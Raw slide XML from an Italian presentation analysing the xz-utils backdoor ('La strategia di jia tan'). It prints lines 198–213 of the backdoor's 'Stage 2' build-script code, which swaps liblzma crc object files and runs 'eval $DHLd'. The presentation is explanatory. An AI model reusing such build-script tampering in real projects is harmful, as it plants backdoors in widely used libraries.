            <a:r>
              <a:rPr lang="it-IT" sz="600" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Segoe UI"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="Segoe UI"/>
              </a:rPr>
              <a:t>liblzma.la</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="600">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Segoe UI"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="Segoe UI"/>
              </a:rPr>
              <a:t> .</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="600" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Segoe UI"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="Segoe UI"/>
              </a:rPr>
              <a:t>libs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="600">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Segoe UI"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="Segoe UI"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="600" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Segoe UI"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="Segoe UI"/>
              </a:rPr>
              <a:t>liblzma.lai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="600">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Segoe UI"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="Segoe UI"/>
              </a:rPr>
              <a:t> .</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="600" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Segoe UI"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="Segoe UI"/>
              </a:rPr>
              <a:t>libs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="600">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Segoe UI"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="Segoe UI"/>
              </a:rPr>
              <a:t>/liblzma.so* || </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="600" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Segoe UI"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="Segoe UI"/>
              </a:rPr>
              <a:t>true</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" sz="600" err="1">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Segoe UI"/>
              <a:cs typeface="Segoe UI"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" sz="600">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Segoe UI"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="Segoe UI"/>
              </a:rPr>
              <a:t>198: else</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" sz="600">
              <a:latin typeface="Segoe UI"/>
              <a:cs typeface="Segoe UI"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" sz="600">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Segoe UI"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="Segoe UI"/>
              </a:rPr>
              <a:t>199: mv -f .</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="600" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Segoe UI"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="Segoe UI"/>
              </a:rPr>
              <a:t>libs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="600">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Segoe UI"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="Segoe UI"/>
              </a:rPr>
              <a:t>/liblzma_la-crc32-fast.o .</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="600" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Segoe UI"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="Segoe UI"/>
              </a:rPr>
              <a:t>libs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="600">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Segoe UI"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="Segoe UI"/>
              </a:rPr>
              <a:t>/liblzma_la-crc32_fast.o || </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="600" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Segoe UI"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="Segoe UI"/>
              </a:rPr>
              <a:t>true</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" sz="600">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Segoe UI"/>
              <a:cs typeface="Segoe UI"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" sz="600">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Segoe UI"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="Segoe UI"/>
              </a:rPr>
              <a:t>200: mv -f .</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="600" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Segoe UI"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="Segoe UI"/>
              </a:rPr>
              <a:t>libs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="600">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Segoe UI"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="Segoe UI"/>
              </a:rPr>
              <a:t>/liblzma_la-crc64-fast.o .</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="600" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Segoe UI"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="Segoe UI"/>
              </a:rPr>
              <a:t>libs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="600">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Segoe UI"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="Segoe UI"/>
              </a:rPr>
              <a:t>/liblzma_la-crc64_fast.o || </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="600" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Segoe UI"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="Segoe UI"/>
              </a:rPr>
              <a:t>true</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" sz="600" err="1">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Segoe UI"/>
              <a:cs typeface="Segoe UI"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" sz="600">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Segoe UI"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="Segoe UI"/>
              </a:rPr>
              <a:t>201: fi</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" sz="600">
              <a:latin typeface="Segoe UI"/>
              <a:cs typeface="Segoe UI"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" sz="600">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Segoe UI"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="Segoe UI"/>
              </a:rPr>
              <a:t>202: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="600" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Segoe UI"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="Segoe UI"/>
              </a:rPr>
              <a:t>rm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="600">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Segoe UI"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="Segoe UI"/>
              </a:rPr>
              <a:t> -f .</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="600" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Segoe UI"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="Segoe UI"/>
              </a:rPr>
              <a:t>libs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="600">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Segoe UI"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="Segoe UI"/>
              </a:rPr>
              <a:t>/liblzma_la-crc32-fast.o || </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="600" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Segoe UI"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="Segoe UI"/>
              </a:rPr>
              <a:t>true</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" sz="600" err="1">
              <a:latin typeface="Segoe UI"/>
              <a:cs typeface="Segoe UI"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" sz="600">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Segoe UI"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="Segoe UI"/>
              </a:rPr>
              <a:t>203: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="600" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Segoe UI"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="Segoe UI"/>
              </a:rPr>
              <a:t>rm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="600">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Segoe UI"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="Segoe UI"/>
              </a:rPr>
              <a:t> -f .</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="600" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Segoe UI"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="Segoe UI"/>
              </a:rPr>
              <a:t>libs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="600">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Segoe UI"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="Segoe UI"/>
              </a:rPr>
              <a:t>/liblzma_la-crc64-fast.o || </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="600" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Segoe UI"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="Segoe UI"/>
              </a:rPr>
              <a:t>true</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" sz="600">
              <a:latin typeface="Segoe UI"/>
              <a:cs typeface="Segoe UI"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" sz="600">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Segoe UI"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="Segoe UI"/>
              </a:rPr>
              <a:t>204: else</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" sz="600">
              <a:latin typeface="Segoe UI"/>
              <a:cs typeface="Segoe UI"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" sz="600">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Segoe UI"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="Segoe UI"/>
              </a:rPr>
              <a:t>205: mv -f .</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="600" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Segoe UI"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="Segoe UI"/>
              </a:rPr>
              <a:t>libs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="600">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Segoe UI"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="Segoe UI"/>
              </a:rPr>
              <a:t>/liblzma_la-crc32-fast.o .</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="600" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Segoe UI"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="Segoe UI"/>
              </a:rPr>
              <a:t>libs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="600">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Segoe UI"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="Segoe UI"/>
              </a:rPr>
              <a:t>/liblzma_la-crc32_fast.o || </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="600" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Segoe UI"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="Segoe UI"/>
              </a:rPr>
              <a:t>true</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" sz="600">
              <a:latin typeface="Segoe UI"/>
              <a:cs typeface="Segoe UI"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" sz="600">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Segoe UI"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="Segoe UI"/>
              </a:rPr>
              <a:t>206: mv -f .</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="600" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Segoe UI"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="Segoe UI"/>
              </a:rPr>
              <a:t>libs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="600">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Segoe UI"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="Segoe UI"/>
              </a:rPr>
              <a:t>/liblzma_la-crc64-fast.o .</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="600" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Segoe UI"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="Segoe UI"/>
              </a:rPr>
              <a:t>libs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="600">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Segoe UI"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="Segoe UI"/>
              </a:rPr>
              <a:t>/liblzma_la-crc64_fast.o || </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="600" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Segoe UI"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="Segoe UI"/>
              </a:rPr>
              <a:t>true</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" sz="600">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Segoe UI"/>
              <a:cs typeface="Segoe UI"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" sz="600">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Segoe UI"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="Segoe UI"/>
              </a:rPr>
              <a:t>207: fi</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" sz="600">
              <a:latin typeface="Segoe UI"/>
              <a:cs typeface="Segoe UI"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" sz="600">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Segoe UI"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="Segoe UI"/>
              </a:rPr>
              <a:t>208: else</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" sz="600">
              <a:latin typeface="Segoe UI"/>
              <a:cs typeface="Segoe UI"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" sz="600">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Segoe UI"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="Segoe UI"/>
              </a:rPr>
              <a:t>209: mv -f .</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="600" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Segoe UI"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="Segoe UI"/>
              </a:rPr>
              <a:t>libs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="600">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Segoe UI"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="Segoe UI"/>
              </a:rPr>
              <a:t>/liblzma_la-crc64-fast.o .</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="600" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Segoe UI"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="Segoe UI"/>
              </a:rPr>
              <a:t>libs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="600">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Segoe UI"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="Segoe UI"/>
              </a:rPr>
              <a:t>/liblzma_la-crc64_fast.o || </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="600" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Segoe UI"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="Segoe UI"/>
              </a:rPr>
              <a:t>true</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" sz="600">
              <a:latin typeface="Segoe UI"/>
              <a:cs typeface="Segoe UI"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" sz="600">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Segoe UI"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="Segoe UI"/>
              </a:rPr>
              <a:t>210: fi</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" sz="600">
              <a:latin typeface="Segoe UI"/>
              <a:cs typeface="Segoe UI"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" sz="600">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Segoe UI"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="Segoe UI"/>
              </a:rPr>
              <a:t>211: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="600" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Segoe UI"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="Segoe UI"/>
              </a:rPr>
              <a:t>rm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="600">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Segoe UI"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="Segoe UI"/>
              </a:rPr>
              <a:t> -f liblzma_la-crc64-fast.o || </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="600" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Segoe UI"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="Segoe UI"/>
              </a:rPr>
              <a:t>true</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" sz="600">
              <a:latin typeface="Segoe UI"/>
              <a:cs typeface="Segoe UI"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" sz="600">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Segoe UI"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="Segoe UI"/>
              </a:rPr>
              <a:t>212: fi</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" sz="600">
              <a:latin typeface="Segoe UI"/>
              <a:cs typeface="Segoe UI"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" sz="600">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Segoe UI"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="Segoe UI"/>
              </a:rPr>
              <a:t>213: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="600" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Segoe UI"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="Segoe UI"/>
              </a:rPr>
              <a:t>eval</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="600">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Segoe UI"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="Segoe UI"/>
              </a:rPr>
              <a:t> $</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="600" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Segoe UI"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="Segoe UI"/>
              </a:rPr>
              <a:t>DHLd</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" sz="600" err="1">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="Segoe UI"/>
              <a:ea typeface="+mn-lt"/>
              <a:cs typeface="Segoe UI"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="it-IT" sz="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078748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F2AFF39-6F5A-1E50-7CDE-8AAD21C2B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167" y="3300"/>
            <a:ext cx="10524738" cy="1452552"/>
          </a:xfrm>
          <a:solidFill>
            <a:schemeClr val="bg2"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" sz="4000"/>
              <a:t> La strategia di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="4000" err="1"/>
              <a:t>jia</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="4000"/>
              <a:t> tan</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT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A698C9B-A4EA-4166-BB4E-5F2D0E1F8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AFF03-0A74-4B45-B900-A104A13AD368}" type="datetime1">
              <a:rPr lang="it-IT"/>
              <a:t>07/06/2024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B864F53-019D-926A-DB74-BA373E3FA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83DB1B8-299C-899A-BCC9-0785B184C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71</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="37" name="Segnaposto contenuto 36" descr="Immagine che contiene schizzo, diagramma, pixel&#10;&#10;Descrizione generata automaticamente">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6400CFC6-8C27-B738-B0F7-BEBC02B5C7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433" y="7285"/>
            <a:ext cx="1676961" cy="1453403"/>
          </a:xfr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C584BB4A-FACA-4161-5F39-9ECB562902C0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="138548" y="1927662"/>
            <a:ext cx="4184043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800" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Stage 2</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" b="1">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="11" name="Immagine 10" descr="Immagine che contiene testo, schermata, Carattere, design&#10;&#10;Descrizione generata automaticamente">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EC5E5C30-5C51-0CE0-68BD-6FE925C273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9446" y="1457633"/>
            <a:ext cx="6929141" cy="5270090"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Freccia a destra 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B37BA449-1C67-CE05-B4D0-F42FE7E2498C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2661478" y="5336760"/>
            <a:ext cx="1258956" cy="43069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Parentesi graffa aperta 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D9D45759-2F6B-4D38-3014-13950D1E2518}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4108174" y="4734890"/>
            <a:ext cx="463823" cy="164547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173053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F2AFF39-6F5A-1E50-7CDE-8AAD21C2B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167" y="3300"/>
            <a:ext cx="10524738" cy="1452552"/>
          </a:xfrm>
          <a:solidFill>
            <a:schemeClr val="bg2"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" sz="4000"/>
              <a:t> La strategia di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="4000" err="1"/>
              <a:t>jia</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="4000"/>
              <a:t> tan</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT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A698C9B-A4EA-4166-BB4E-5F2D0E1F8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AFF03-0A74-4B45-B900-A104A13AD368}" type="datetime1">
              <a:rPr lang="it-IT"/>
              <a:t>07/06/2024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B864F53-019D-926A-DB74-BA373E3FA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83DB1B8-299C-899A-BCC9-0785B184C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72</a:t>
            </a:fld>
